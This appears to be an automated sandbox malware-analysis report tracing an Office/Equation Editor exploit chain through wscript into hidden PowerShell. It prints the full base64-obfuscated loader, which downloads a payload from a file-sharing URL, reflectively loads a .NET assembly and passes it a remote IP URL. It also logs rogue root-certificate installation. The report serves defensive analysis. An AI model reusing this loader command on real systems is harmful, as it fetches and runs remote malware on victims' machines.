        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002E21C8 push ebx; iretd 8_2_002E21EA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002E25E1 push ebx; retf 8_2_002E25EA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002E4650 push ebp; ret 8_2_002E465A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002E0F78 push eax; retn 0065h8_2_002E0FF2
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002E0F9D push eax; retn 0065h8_2_002E0FF2
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002E0FF7 push eax; retn 0065h8_2_002E0FF2
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002E0FF7 push eax; retn 0065h8_2_002E1002
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002E0FCD push eax; retn 0065h8_2_002E0FF2
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00453910 pushad ; retf 8_2_00453AB9

        Persistence and Installation Behavior

        barindex
        Installs new ROOT certificates
        Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035A0477 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035A0477
        Source: C:\Windows\SysWOW64\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
